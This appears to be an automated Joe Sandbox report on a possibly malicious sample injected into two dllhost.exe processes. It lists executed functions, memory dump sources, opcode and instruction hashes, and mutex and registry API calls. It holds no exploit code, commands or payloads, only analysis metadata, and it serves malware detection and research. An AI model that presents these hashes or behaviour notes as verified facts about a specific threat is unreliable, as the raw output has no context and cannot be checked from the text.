Opcode Fuzzy Hash: bbb3da5a0f41680cdb3618d6fe8b6b2864e1682afcd67db771208d97ad2c7302
Instruction Fuzzy Hash: CAD05E342001814BC719DA0CC194F9977E4BB84704F1644EDEC108B676C3B8DDC4C700

Uniqueness

Uniqueness Score: 0.00%

Non-executed Functions

Analysis Process: dllhost.exe PID: 3244 Parent PID: 1560 dllhost.exeCOMMON

Execution Graph

Execution Coverage:	11.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	19
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 01200258, Relevance: 4.0, Strings: 3, Instructions: 278
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\1m^, xrefs: 0120034F, 01200354
(a$, xrefs: 01200381
[1m^, xrefs: 01200415, 0120041A

Memory Dump Source

Source File: 0000000F.00000002.600516958.01200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1200000_dllhost.jbxd

Similarity

API ID:
String ID: (a$$\1m^$[1m^
API String ID: 0-771276571
Opcode ID: 54881175b39af3a979a554b2d7a182947afbcf611f76c5799dce797e6907ab6e
Instruction ID: 9b45dc506a517ef54fff5bf475ebca09f4059ef2eac852f256b72f472972c759
Opcode Fuzzy Hash: 54881175b39af3a979a554b2d7a182947afbcf611f76c5799dce797e6907ab6e
Instruction Fuzzy Hash: B5B1AE30F48200CFDB29DB74E444ABD37A2EB89344B124879D90A9B7A5DF319C69CF95

Uniqueness

Uniqueness Score: 100.00%

Function 01200250, Relevance: 4.0, Strings: 3, Instructions: 274
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\1m^, xrefs: 0120034F, 01200354
(a$, xrefs: 01200381
[1m^, xrefs: 01200415, 0120041A

Memory Dump Source

Source File: 0000000F.00000002.600516958.01200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1200000_dllhost.jbxd

Similarity

API ID:
String ID: (a$$\1m^$[1m^
API String ID: 0-771276571
Opcode ID: 498156ac1905bd1c950d4c92a029d539895e18df72097685209763f8a5c1ff97
Instruction ID: a20e8387ca4fffebb05c057d0a36d397153339ea875d6fc00afe63c5a725bd5e
Opcode Fuzzy Hash: 498156ac1905bd1c950d4c92a029d539895e18df72097685209763f8a5c1ff97
Instruction Fuzzy Hash: 78A1AE30F48200CFD729DB74E444ABD37A2EB89344B124879D90A9B7A5DF319C69CF95

Uniqueness

Uniqueness Score: 100.00%

Function 012002A5, Relevance: 4.0, Strings: 3, Instructions: 251
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\1m^, xrefs: 0120034F, 01200354
(a$, xrefs: 01200381
[1m^, xrefs: 01200415, 0120041A

Memory Dump Source

Source File: 0000000F.00000002.600516958.01200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1200000_dllhost.jbxd

Similarity

API ID:
String ID: (a$$\1m^$[1m^
API String ID: 0-771276571
Opcode ID: f09be7afda391a08b0c644586a3943cd59c17bc51082d407edd98ff6817b2358
Instruction ID: 20015997327a69789ee3df5f1f2cd0236fe6a72e4e0371cfffe44e217702d6d6
Opcode Fuzzy Hash: f09be7afda391a08b0c644586a3943cd59c17bc51082d407edd98ff6817b2358
Instruction Fuzzy Hash: 1BA1BD30B48200CFDB29DB74E404ABD37A2EB89344B168879D80A9B7A5DF319C69CF55

Uniqueness

Uniqueness Score: 100.00%

Function 0023A612, Relevance: 1.6, APIs: 1, Instructions: 89
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 0023A6B9

Memory Dump Source

Source File: 0000000F.00000002.600247047.0023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_23a000_dllhost.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 353651b0fd43cdb5372153b17cffc5c3ef5a509d4b01f9e38fd535dfe4aa50d4
Instruction ID: e9a4d2e66bb9fadd0ce8f0fb8a971325d8566adde5c08bde29f919d18de26d4c
Opcode Fuzzy Hash: 353651b0fd43cdb5372153b17cffc5c3ef5a509d4b01f9e38fd535dfe4aa50d4
Instruction Fuzzy Hash: 643193B55097805FE722CF25DC85B56FFF8EF06314F0984AAE984CB292D374A909C762

Uniqueness

Uniqueness Score: 0.03%

Function 0023A361, Relevance: 1.6, APIs: 1, Instructions: 85
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNEL32(?,00000E38,4A820F2C,00000000,00000000,00000000,00000000), ref: 0023A40C

Memory Dump Source

Source File: 0000000F.00000002.600247047.0023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_23a000_dllhost.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: efc633fa205ab15c58391a18f1a00b70da181b4c80d0a96f8794ff95eec174c1
Instruction ID: fe57948f669336e7ab552c82c30c893d78c870b05423deb0841afda147e9aaf3
Opcode Fuzzy Hash: efc633fa205ab15c58391a18f1a00b70da181b4c80d0a96f8794ff95eec174c1
Instruction Fuzzy Hash: CD3181B1509780AFE721CF11CC84F62BBB8EF46710F08859AE9858B193D364E949CB72

Uniqueness

Uniqueness Score: 0.03%

Function 0023A462, Relevance: 1.6, APIs: 1, Instructions: 77
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegSetValueExW.KERNEL32(?,00000E38,4A820F2C,00000000,00000000,00000000,00000000), ref: 0023A4F8

Memory Dump Source

Source File: 0000000F.00000002.600247047.0023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_23a000_dllhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: a6d5df0274f9b9b7f38aac2173115e178edac6c7e45aaf8484cb03717095ae5b
Instruction ID: 308a4d5ac9dbf94a9b2f105a60dc42a262a85170741fc3827fb62775fc2378c6
Opcode Fuzzy Hash: a6d5df0274f9b9b7f38aac2173115e178edac6c7e45aaf8484cb03717095ae5b
Instruction Fuzzy Hash: DB2181B25093806FE7228F11DC45F67BFB8EF46320F08849AE9859B692D264E948C771

Uniqueness

Uniqueness Score: 0.21%

Function 0023A646, Relevance: 1.6, APIs: 1, Instructions: 72
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 0023A6B9

Memory Dump Source

Source File: 0000000F.00000002.600247047.0023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_23a000_dllhost.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: cfd7fb224d4f9d3bc043bf5ef98cdd75a4b47fba91c599c20d1b036819e9fa0a
Instruction ID: 6a656b928ab108cab6d40ffb267cbd8c5c47af1a48de2a7678aa93078f775ed7
Opcode Fuzzy Hash: cfd7fb224d4f9d3bc043bf5ef98cdd75a4b47fba91c599c20d1b036819e9fa0a
Instruction Fuzzy Hash: 5721D4B15043409FEB20DF25CC85F66FBE8EF44314F0884AAE9448B641D370E805CB72

Uniqueness

Uniqueness Score: 0.03%

Function 0023A392, Relevance: 1.6, APIs: 1, Instructions: 69
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNEL32(?,00000E38,4A820F2C,00000000,00000000,00000000,00000000), ref: 0023A40C

Memory Dump Source

Source File: 0000000F.00000002.600247047.0023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_23a000_dllhost.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 2ba00efc071246d7b4d0a0a7358ca887fc2e3d8513885fe435db184efa4dbc4e
Instruction ID: 0709a2d86490cf4875604930d964cc44b027a3f5e86d3773d038251deea6f77a
Opcode Fuzzy Hash: 2ba00efc071246d7b4d0a0a7358ca887fc2e3d8513885fe435db184efa4dbc4e
Instruction Fuzzy Hash: 8B21C3B12043009FE720CF11CC84F62F7ECEF44710F04856AEA4587691D7A0ED55CA72

Uniqueness

Uniqueness Score: 0.03%

Function 0023A486, Relevance: 1.6, APIs: 1, Instructions: 65
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegSetValueExW.KERNEL32(?,00000E38,4A820F2C,00000000,00000000,00000000,00000000), ref: 0023A4F8

Memory Dump Source

Source File: 0000000F.00000002.600247047.0023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_23a000_dllhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: d293b55f9689c66d7b3c38c48fd165937eab2fa3225ad8c23cb0f36932209e7c
Instruction ID: efdeb44e2fdc79545c614ab16dfefe3d983864c3960877293a2c90b8ef0005e6
Opcode Fuzzy Hash: d293b55f9689c66d7b3c38c48fd165937eab2fa3225ad8c23cb0f36932209e7c
Instruction Fuzzy Hash: D211D3B2504300AFEB20DF11DC45F67FBACEF44720F04856AEE458A682D7B0E954CAB2

Uniqueness

Uniqueness Score: 0.21%

Function 0023A710, Relevance: 1.3, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE(?), ref: 0023A780

Memory Dump Source

Source File: 0000000F.00000002.600247047.0023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_23a000_dllhost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 028acbf7f0ad994a8c59667fd6a18c7bdac50dbd0cdddee408b106c9fe69f0ed
Instruction ID: 8916aa834e762fb3467a3e4b3946d93e7424e5efaf5e88dfb177f892590f00cd
Opcode Fuzzy Hash: 028acbf7f0ad994a8c59667fd6a18c7bdac50dbd0cdddee408b106c9fe69f0ed
Instruction Fuzzy Hash: 5621D5B54093C09FDB128F25DC85752BFB4EF06324F0980EBED848B693D2759949C762

Uniqueness

Uniqueness Score: 0.03%

Function 0023A74E, Relevance: 1.3, APIs: 1, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE(?), ref: 0023A780

Memory Dump Source

Source File: 0000000F.00000002.600247047.0023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_23a000_dllhost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 8890c6d9af022042d8b0828837e041921ff42e883caa7a196d27def5dcacd71d
Instruction ID: 2075490b87d5b04e63ceb213e182846a8a072e8d2cb677218a59cd37fdf03505
Opcode Fuzzy Hash: 8890c6d9af022042d8b0828837e041921ff42e883caa7a196d27def5dcacd71d
Instruction Fuzzy Hash: 2801F2B15043408FEB10CF25D98976AFBA4EF44320F08C0BBED498B752D3B5E854CAA2

Uniqueness

Uniqueness Score: 0.03%

Function 01200080, Relevance: .1, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000F.00000002.600516958.01200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1200000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e351d8885463b0fb558d3103cafa4a3f62c6c061f2f82fd4cbe00fb67d16bf8
Instruction ID: d3cb315c85f63e535bfee48c7106e6a18e7c43de11df9b0bc34bcd6a0e601e54
Opcode Fuzzy Hash: 7e351d8885463b0fb558d3103cafa4a3f62c6c061f2f82fd4cbe00fb67d16bf8
Instruction Fuzzy Hash: 09413330E8E186CBC768DF35E9418A9B7B2EBC02087438D29D5484BA39DB745D6DCF91

Uniqueness

Uniqueness Score: 0.00%

Function 01200014, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000F.00000002.600516958.01200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1200000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b31e0a05e10c460ffdeccc192078ebb817ca82d4f1b440a5a42ff4ea4d51c7b2
Instruction ID: 65a187255b8da542f4e7bc23aeade83386f402b27a6f49c9924b5f5f631d80a6
Opcode Fuzzy Hash: b31e0a05e10c460ffdeccc192078ebb817ca82d4f1b440a5a42ff4ea4d51c7b2
Instruction Fuzzy Hash: 660101A652F3E04EE7139B70886A5503F71AE1B20831E45CBC0C1CF5B3D6995A0ED736

Uniqueness

Uniqueness Score: 0.00%

Function 013307F7, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000F.00000002.600637441.01330000.00000040.00000040.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1330000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5065d86cf0befd58f4fa746052fe6e63ccdac304932460e1bc71dd4f62dacfcb
Instruction ID: 085a263047681b9539c21d142f55a0a1abab8c14b6308fdfe55eca4619d35c53
Opcode Fuzzy Hash: 5065d86cf0befd58f4fa746052fe6e63ccdac304932460e1bc71dd4f62dacfcb
Instruction Fuzzy Hash: 2E01D6B640D7806FD311CB15AC40853BFA8DF8623070984ABFD488B622C225B949CBB1

Uniqueness

Uniqueness Score: 0.00%

Function 0133081E, Relevance: .0, Instructions: 27
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000F.00000002.600637441.01330000.00000040.00000040.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1330000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7135da4aca56d428e976fb1b63a2a290afe20af74fe3c7bc676b75be430fc681
Instruction ID: 99984bb109fd18696090b0d2742f2ee4c3d1d8c5813e8784ec48a2958cf44b55
Opcode Fuzzy Hash: 7135da4aca56d428e976fb1b63a2a290afe20af74fe3c7bc676b75be430fc681
Instruction Fuzzy Hash: 5AE09276A047008B9650CF0AFC41462FBA4EBC4630B08C07FED0D8B711D675B944CAA1

Uniqueness

Uniqueness Score: 0.00%

Function 002323F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.600236467.00232000.00000040.00000001.sdmp, Offset: 00232000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_232000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9837bb74e7c8c2cf2126dd1d75173a43e8a511891ef92979e27650755cdbd89
Instruction ID: 6d5262ce363f719e126754bd31c531f6360b59a712d725f5a0296f660e942cf7
Opcode Fuzzy Hash: c9837bb74e7c8c2cf2126dd1d75173a43e8a511891ef92979e27650755cdbd89
Instruction Fuzzy Hash: CCD05B752155918FD3168E1CC154F5577946B51704F4644F9D800DB663C364E995D300

Uniqueness

Uniqueness Score: 0.00%

Function 002323BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.600236467.00232000.00000040.00000001.sdmp, Offset: 00232000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_232000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3f586898e6341fe97e31a0f6cb7ea3ec937dd6550fa11efdd2f6e3aefac435c
Instruction ID: 48a3da5b65cee83a5e27d0e5c515656877802a4082ea1f838901805a36156e31
Opcode Fuzzy Hash: a3f586898e6341fe97e31a0f6cb7ea3ec937dd6550fa11efdd2f6e3aefac435c
Instruction Fuzzy Hash: EDD05E742501828BC719DE0CC194F59B7E4AB80B04F1644EDBC108B666C3B8DDD4C700

Uniqueness

Uniqueness Score: 0.00%

Non-executed Functions

Analysis Process: dllhost.exe PID: 392 Parent PID: 1560 dllhost.exeCOMMON

Execution Graph

Execution Coverage:	12%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	19
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 004E0258, Relevance: 4.0, Strings: 3, Instructions: 278
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(a$, xrefs: 004E0381
\1m^, xrefs: 004E034F, 004E0354
[1m^, xrefs: 004E0415, 004E041A

Memory Dump Source

Source File: 00000010.00000002.611251920.004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4e0000_dllhost.jbxd

Similarity

API ID:
String ID: (a$$\1m^$[1m^
API String ID: 0-771276571
Opcode ID: 8fc9b946eb2a097f6ea7a01818d090d5c762b44391d277a4f1fa9457d17d0eec
Instruction ID: 8a3cc9d63dfecfe99d7d43af9434f15c8bc82c938b8acbcfd7c97f2d33b5b7be
Opcode Fuzzy Hash: 8fc9b946eb2a097f6ea7a01818d090d5c762b44391d277a4f1fa9457d17d0eec
Instruction Fuzzy Hash: D0B1CD30B00340CFCB19DB75D498AAD37A2AB89345B11486BD80A9B7A8DF75DC97CF91

Uniqueness

Uniqueness Score: 100.00%

Function 004E024A, Relevance: 4.0, Strings: 3, Instructions: 277
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(a$, xrefs: 004E0381
\1m^, xrefs: 004E034F, 004E0354
[1m^, xrefs: 004E0415, 004E041A

Memory Dump Source

Source File: 00000010.00000002.611251920.004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4e0000_dllhost.jbxd

Similarity

API ID:
String ID: (a$$\1m^$[1m^
API String ID: 0-771276571
Opcode ID: 43b64e1188754f5faa040a9043c406107d0fe484087bb511bd2f7d55c2e78229
Instruction ID: 123fdd80ca35f4f0b7be7160256137b26ce3acecefb7d313a3b438fe9d9c3b6e
Opcode Fuzzy Hash: 43b64e1188754f5faa040a9043c406107d0fe484087bb511bd2f7d55c2e78229
Instruction Fuzzy Hash: 5BB1DE30B00340CFC719DB75D488AAD37A2AB89345B11886BD8069B7A8DF35DC97CF91

Uniqueness

Uniqueness Score: 100.00%

Function 004E02A5, Relevance: 4.0, Strings: 3, Instructions: 251
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(a$, xrefs: 004E0381
\1m^, xrefs: 004E034F, 004E0354
[1m^, xrefs: 004E0415, 004E041A

Memory Dump Source

Source File: 00000010.00000002.611251920.004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4e0000_dllhost.jbxd

Similarity

API ID:
String ID: (a$$\1m^$[1m^
API String ID: 0-771276571
Opcode ID: a56dbc426d3e7c074767f3734b8a1ab9646f27440734b3f4a68b8c0c0491971c
Instruction ID: 52a258b0d86129a5ab36a4628a2caca8ea7e3788a5cf1f0ae704eed632c0c9e8
Opcode Fuzzy Hash: a56dbc426d3e7c074767f3734b8a1ab9646f27440734b3f4a68b8c0c0491971c
Instruction Fuzzy Hash: CCA1CF30B40240CFCB19DB75D094AAD33A3AB89345B15886BD80A9B7A8DF75DC97CF91

Uniqueness

Uniqueness Score: 100.00%

Function 0023A612, Relevance: 1.6, APIs: 1, Instructions: 89
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 0023A6B9

Memory Dump Source

Source File: 00000010.00000002.610939115.0023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_23a000_dllhost.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 779a7a265ace5a31da455626b31122b722c429ba9adaeeeb05069390ecdf330c
Instruction ID: eebe3de038f6fc31b05b66bd36f61d397eedbd5d2281d68bbe8cf82157ed70cd
Opcode Fuzzy Hash: 779a7a265ace5a31da455626b31122b722c429ba9adaeeeb05069390ecdf330c
Instruction Fuzzy Hash: 563193B55097805FE722CF25CC85B56FFF8EF06314F0984AAE984CB292D374A909C762

Uniqueness

Uniqueness Score: 0.03%

Function 0023A361, Relevance: 1.6, APIs: 1, Instructions: 85
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNEL32(?,00000E38,488B1C07,00000000,00000000,00000000,00000000), ref: 0023A40C

Memory Dump Source

Source File: 00000010.00000002.610939115.0023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_23a000_dllhost.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 58ebb2c5a533690be783c4943c03773d84b954c0aeb69deb2b51af563d8b8dbd
Instruction ID: 4d033cd5e27f5a647fe390dc09390efc938303cb235c77d1ad89e58274b08f03
Opcode Fuzzy Hash: 58ebb2c5a533690be783c4943c03773d84b954c0aeb69deb2b51af563d8b8dbd
Instruction Fuzzy Hash: 0A3184B55097409FE721CF11CC84F52BBBCEF46710F08859AE9858B192D364E949CB71

Uniqueness

Uniqueness Score: 0.03%

Function 0023A462, Relevance: 1.6, APIs: 1, Instructions: 77
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegSetValueExW.KERNEL32(?,00000E38,488B1C07,00000000,00000000,00000000,00000000), ref: 0023A4F8

Memory Dump Source

Source File: 00000010.00000002.610939115.0023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_23a000_dllhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 47b257a70f28a6ede5b5ad69dea1ac73dbf3825a2a0c7aab1580ab1086dea6ed
Instruction ID: a10364802a2c7fae43d530229319a7ad74f8d374e0eb749cdccdefcace624ff3
Opcode Fuzzy Hash: 47b257a70f28a6ede5b5ad69dea1ac73dbf3825a2a0c7aab1580ab1086dea6ed
Instruction Fuzzy Hash: AE2192B25093806FD7228F11DC45F67BFBCEF46720F08849AE985DB692D264E948C771

Uniqueness

Uniqueness Score: 0.21%

Function 0023A646, Relevance: 1.6, APIs: 1, Instructions: 72
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 0023A6B9

Memory Dump Source

Source File: 00000010.00000002.610939115.0023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_23a000_dllhost.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: fe308f170c459743420c6c559af94b9c364fd3f8311eedd938533c810e3db2aa
Instruction ID: 93a857cb7b0b0ce1e13281dcb7a078a89f131331fec9762e39be563ed12c8cfd
Opcode Fuzzy Hash: fe308f170c459743420c6c559af94b9c364fd3f8311eedd938533c810e3db2aa
Instruction Fuzzy Hash: D521C2B15043409FEB20DF25CC85B66FBE8EF44314F0884AAE9848B641D370E805CB76

Uniqueness

Uniqueness Score: 0.03%

Function 0023A392, Relevance: 1.6, APIs: 1, Instructions: 69
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNEL32(?,00000E38,488B1C07,00000000,00000000,00000000,00000000), ref: 0023A40C

Memory Dump Source

Source File: 00000010.00000002.610939115.0023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_23a000_dllhost.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 75c353879875bd25c32b986ef7de7f44671599981c1aaf09a676c7cca12650e7
Instruction ID: c70eec0244576356065a8915d96bb3e468ddab44ddc444d5e177621abed5f3cc
Opcode Fuzzy Hash: 75c353879875bd25c32b986ef7de7f44671599981c1aaf09a676c7cca12650e7
Instruction Fuzzy Hash: 4521C0B1204300AFE720CF11CC84F66F7ECEF44720F04856AEA858B691D7A0ED55CA72

Uniqueness

Uniqueness Score: 0.03%

Function 0023A486, Relevance: 1.6, APIs: 1, Instructions: 65
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegSetValueExW.KERNEL32(?,00000E38,488B1C07,00000000,00000000,00000000,00000000), ref: 0023A4F8

Memory Dump Source

Source File: 00000010.00000002.610939115.0023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_23a000_dllhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 85ecb91c34428057d01a4bd7f87b92a900fe8bf63801597105fcf4d01ca074b8
Instruction ID: 7faeddde2cb0237b6ce75ad176cf5842ae92d1bcaa6be477d5e150f63c139e2f
Opcode Fuzzy Hash: 85ecb91c34428057d01a4bd7f87b92a900fe8bf63801597105fcf4d01ca074b8
Instruction Fuzzy Hash: 3A11D3B1504300AFEB20CE11CC45F67FBACEF44720F04856AEE858A652D760E954CAB2

Uniqueness

Uniqueness Score: 0.21%

Function 0023A710, Relevance: 1.3, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE(?), ref: 0023A780

Memory Dump Source

Source File: 00000010.00000002.610939115.0023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_23a000_dllhost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: dacc1dd3825bfc992da2ad1ffff8331165160c628bfce09acf74debfa623c2d1
Instruction ID: 2dfea501b576ab790086379ab1516176dc3fdedc058066e1f1cef93734afe145
Opcode Fuzzy Hash: dacc1dd3825bfc992da2ad1ffff8331165160c628bfce09acf74debfa623c2d1
Instruction Fuzzy Hash: D521C3B54093C09FDB128F25DD99755BFB4EF02324F0980EBEC848B663D2659909C762

Uniqueness

Uniqueness Score: 0.03%

Function 0023A74E, Relevance: 1.3, APIs: 1, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE(?), ref: 0023A780

Memory Dump Source

Source File: 00000010.00000002.610939115.0023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_23a000_dllhost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 48df6331004efd624fe594306eb66e6adcee064eeec6865ec0181989f6a2f9e5
Instruction ID: 81fcce4d00882b837ce4a9a632ca53b3fd415c851253a0098f645b79ac8ee246
Opcode Fuzzy Hash: 48df6331004efd624fe594306eb66e6adcee064eeec6865ec0181989f6a2f9e5
Instruction Fuzzy Hash: 1601F2B55043408FEB10CF15D989769FBA4EF45320F08C0BBED898B712D375E854CAA2

Uniqueness

Uniqueness Score: 0.03%

Function 004E0080, Relevance: .1, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000010.00000002.611251920.004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4e0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fb4292467e5d43bfa82b639692d6a3637d6b016bb6d902cdbcfd25427bc0e88
Instruction ID: a70ab0a2f0069a23bc67bf069a3e8c9167cc9ed34b0af80467b20d98affba2f5
Opcode Fuzzy Hash: 9fb4292467e5d43bfa82b639692d6a3637d6b016bb6d902cdbcfd25427bc0e88
Instruction Fuzzy Hash: 47413F30A4A342CBC748DF35E5C5999B7B2ABC03487418D2AD5484BA2CDFB49D6BCF91

Uniqueness

Uniqueness Score: 0.00%

Function 014707F7, Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000010.00000002.611394921.01470000.00000040.00000040.sdmp, Offset: 01470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1470000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65e4297391960d9f5b57763eaf58c44c5ec039e61f1059efca874da926cd5347
Instruction ID: 477e42142531331fda4a4a65141e42f17ee6bcd7ee0bf16efa318d0e00e86f80
Opcode Fuzzy Hash: 65e4297391960d9f5b57763eaf58c44c5ec039e61f1059efca874da926cd5347
Instruction Fuzzy Hash: AA01847650D7C05FD7128B159C55866FFA8EF8762070D80DFFC898B622D225A909CB72

Uniqueness

Uniqueness Score: 0.00%

Function 004E001D, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

